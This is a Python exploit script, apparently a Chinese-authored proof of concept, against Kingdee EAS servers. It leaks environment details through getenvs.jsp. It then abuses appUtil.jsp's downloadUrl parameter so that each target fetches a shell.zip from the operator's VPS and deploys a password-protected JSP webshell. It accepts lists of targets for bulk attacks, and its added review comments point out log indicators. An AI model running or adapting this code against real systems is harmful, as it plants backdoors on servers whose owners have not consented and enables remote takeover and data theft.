import argparse
from cgitb import text
import os
from pickletools import pyint
import re
import warnings
import requests
from termcolor import cprint

# Silence urllib3's InsecureRequestWarning (every request in this file passes
# verify=False, i.e. TLS certificates are never validated) and all other warnings.
requests.packages.urllib3.disable_warnings()
warnings.filterwarnings('ignore')
# TF_CPP_MIN_LOG_LEVEL only affects TensorFlow's native logging; none of the
# visible imports bring TensorFlow in, so this looks like a leftover setting.
os.environ["TF_CPP_MIN_LOG_LEVEL"] = '1'

# Browser-like headers sent with every request below. The User-Agent and
# Accept-Language values are fixed strings, so they are a stable fingerprint
# a defender can match in web-server access logs.
headers = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
    'Accept-Language': 'zh-CN,zh;q=0.9',
    'Accept-Encoding': 'gzip, deflate, br',
    # 'Connection':'keep-alive',  # keep-alive reuses one connection; after many requests, failing to open a new one raised "Max retries exceeded with url"
    'Upgrade-Insecure-Requests': '1',
    'Pragma': 'no-cache',
    'Cache-Control': 'no-cache',
    'Connection': 'close',  # works around the "Max retries exceeded with url" error
}

def verify(url_arg, file_arg,exp_arg):
    """Probe each target for the EAS ``getenvs.jsp`` environment page and hand hits to ``exp``.

    Args:
        url_arg: a single target; when ``None`` the targets are read from ``file_arg``.
            ``'http://'`` is prepended when the string does not contain ``'http'``.
        file_arg: path to a text file with one target per line (only read when
            ``url_arg`` is ``None``).
        exp_arg: forwarded unchanged to ``exp`` as its third argument.

    Side effects:
        ``./result.txt`` is truncated at the start of every call; progress is
        printed with ``cprint``.

    Errors:
        Every exception raised inside the per-target loop is swallowed
        (``except Exception: pass``), so timeouts, DNS failures and parse errors
        are indistinguishable from "not vulnerable" in the output.
    """
    # Truncate the result file up front; the handle is closed explicitly rather
    # than via ``with``.
    result_txt = open('./result.txt', 'a+', encoding='utf-8')
    result_txt.truncate(0)
    result_txt.close()
    if url_arg is None:
        # NOTE(review): this handle is never closed explicitly (no ``with``); it is
        # released only when the object is garbage-collected.
        urlfile = open('{}'.format(file_arg),
                       encoding='utf8').read().splitlines()
    else:
        urlfile = ['{}'.format(url_arg)]
    for u in urlfile:
        # Substring test: a line containing 'http' anywhere is treated as already
        # carrying a scheme.
        if 'http' in u:
            url = u
        else:
            url = 'http://'+str(u)
        cprint("[-] 正在检测{}".format(url), 'yellow')
        try:
            # Request path a defender can look for in web-server access logs.
            base_url = str(url)+"/easportal/tools/getenvs.jsp"
            # verify=False: the TLS certificate is not checked.
            resp = requests.get(
                url=base_url, headers=headers, timeout=5, verify=False)
            if resp.status_code == 200 and 'EAS_HOME' in resp.text:
                # Strip all whitespace so the regexes below match the table markup
                # without attribute spacing. ``.replace(' ', '')`` already removes
                # every space, so the following multi-space replaces are no-ops.
                # The local name ``text`` shadows the ``cgitb.text`` import above.
                text = resp.text.replace('\n', '').replace('\r', '').replace('\t', '').replace(
                    ' ', '').replace('  ', '').replace('   ', '').replace('    ', '')
                # Each pattern captures the cell following the OS_NAME / EAS_HOME
                # label in the whitespace-stripped HTML table.
                SERVER_NAME_LISTS = re.findall(r'<tdalign="left"valign="top">OS_NAME</td><tdalign="left"valign="top">(.*?)</td>',text,re.S)
                HOME_PATH_LIST = re.findall(
                    r'<tdalign="left"valign="top">EAS_HOME</td><tdalign="left"valign="top">(.*?)</td>', text, re.S)
                if len(SERVER_NAME_LISTS) > 0:
                    cprint('[+] 识别到操作系统为:{}'.format(SERVER_NAME_LISTS[0]),'green')
                if len(HOME_PATH_LIST)> 0:
                    cprint('[+] 识别到安装目录为:{}'.format(HOME_PATH_LIST[0]),'green')
                    # ``exp`` is invoked even when ``exp_arg`` is None (see ``main``).
                    exp(HOME_PATH_LIST[0],str(url),exp_arg)
            else:
                pass
        except Exception as e:
            # NOTE(review): ``e`` is unused; the failure is dropped without any output.
            pass

def exp(self,base_url,exp_url):
    """Second stage: call ``appUtil.jsp`` on one target and check whether the dropped JSP answers.

    Despite its name, the first parameter is not an instance: this is a plain
    module-level function and ``self`` receives the ``EAS_HOME`` value that
    ``verify`` extracted.

    Args:
        self: EAS_HOME path string recovered by ``verify`` (``str()`` is applied
            again here).
        base_url: target base URL including scheme.
        exp_url: value placed in the ``downloadUrl`` query parameter; ``str()`` is
            applied, so a ``None`` from the command line is sent literally as
            ``'None'``.

    Side effects:
        Appends one line to ``./result.txt`` on success; prints status with
        ``cprint``.

    Errors:
        Any exception is printed and swallowed.

    For defenders: the two request paths used below
    (``/easportal/tools/appUtil.jsp?EAS_HOME=...&type=Rabb&downloadUrl=...`` and
    ``/easportal/tools/deploy/qaxnbshell.jsp``) are the indicators this script
    leaves in access logs, alongside the fixed User-Agent in ``headers``.
    """
    try:
        exp_base_url = base_url +'/easportal/tools/appUtil.jsp?EAS_HOME={}&type=Rabb&downloadUrl={}'.format(str(self),str(exp_url))
        # verify=False: the TLS certificate is not checked.
        resp_exp = requests.get(url=exp_base_url, headers=headers, timeout=5, verify=False)
        # Success heuristic as written: HTTP 200 whose body contains the substring
        # 'false' anywhere. NOTE(review): any 200 page that merely mentions
        # 'false' also satisfies this test.
        if resp_exp.status_code == 200 and 'false' in resp_exp.text:
            verify_url = base_url+'/easportal/tools/deploy/qaxnbshell.jsp'
            resp_verify = requests.get(url=verify_url, headers=headers, timeout=5, verify=False)
            # Only the status code is inspected here, not the response body.
            if resp_verify.status_code == 200:
                cprint('================================','green')
                cprint('[+] webshell上传成功','green')
                cprint('[+] webshell地址:{}  密码:rebeyond,链接工具:冰蝎'.format(verify_url),'green')
                # No ``encoding=`` here (unlike the truncation in ``verify``): the
                # line contains non-ASCII text, so on a non-UTF-8 locale this write
                # may raise UnicodeEncodeError, which is caught and printed below.
                with open('./result.txt', 'a+') as f:
                    f.write('webshell地址:{}  密码:rebeyond,链接工具:冰蝎'.format(verify_url))
                    f.write('\n')
                cprint('================================','green')
            else:
                cprint('[-] webshell上传失败','red')
        else:
            cprint('[-] webshell上传失败','red')
            pass
    except Exception as e:
        # Prints the exception text and continues; no traceback is kept.
        print(e)
        pass


def main():
    """Parse the command line, print the banner and dispatch to ``verify``.

    Options (all optional): ``-u``/``-url`` single target, ``-f``/``-file`` file of
    targets, ``-e``/``-exp`` remote URL forwarded to ``exp``. The validation below
    only prints messages; it never stops execution or rejects a value.
    """
    parser = argparse.ArgumentParser(
        description='''
        金蝶EAS远程命令执行检测poc
        使用时请将本地的shell.zip上传到vps中
        将url填写到-e后面参数中
        by zhizhuo
        ''')
    parser.add_argument('-u', '-url', dest="url",
                        help='单个url检测,输入样例http://www.baidu.com', required=False)
    parser.add_argument('-f', '-file', dest="url_file", nargs='?',
                        help='多个url检测,以文件形式存储,文件中的url格式为http://www.baidu.com或者www.baidu.com', required=False)
    parser.add_argument('-e', '-exp', dest="exp_url", nargs='?',
                        help='请将文件中的shell.zip上传远程VPS,这里里面填写url地址http://xxx.xxx.xx/shell.zip', required=False)
    # NOTE(review): parse_args() is called three times; a single call bound to a
    # local would suffice.
    url_arg = parser.parse_args().url
    file_arg = parser.parse_args().url_file
    exp_arg = parser.parse_args().exp_url
    cprint('''
        金蝶EAS远程命令执行检测poc
        使用时请将本地的shell.zip上传到vps中
        将url填写到-e后面参数中
        by zhizhuo
        ''', "green")
    if exp_arg is None:
        # Only a hint is printed; ``verify`` is still invoked below with
        # ``exp_arg=None``, and ``exp`` then formats it as the literal string 'None'.
        cprint('''
        请输入本地shell.zip上传后远程url地址
        url地址为http://xxx.xxx.xx/shell.zip
        ''', "green")
    else:
        # Substring checks only: 'http://' (or 'https://') and '.zip' anywhere in
        # the string.
        if ('http://' in exp_arg and '.zip' in exp_arg) or ('https://' in exp_arg and '.zip' in exp_arg):
            pass
        else:
            # NOTE(review): the error is printed but the value is still passed on.
            cprint('[-] 远程url地址有误请重新输入', 'red')
    if file_arg is None and url_arg is None:
        cprint("请使用命令-h查看命令使用帮助 --by zhizhuo", 'green')
    else:
        verify(url_arg, file_arg,exp_arg)


# Script entry point; nothing runs on import.
if __name__ == '__main__':
    main()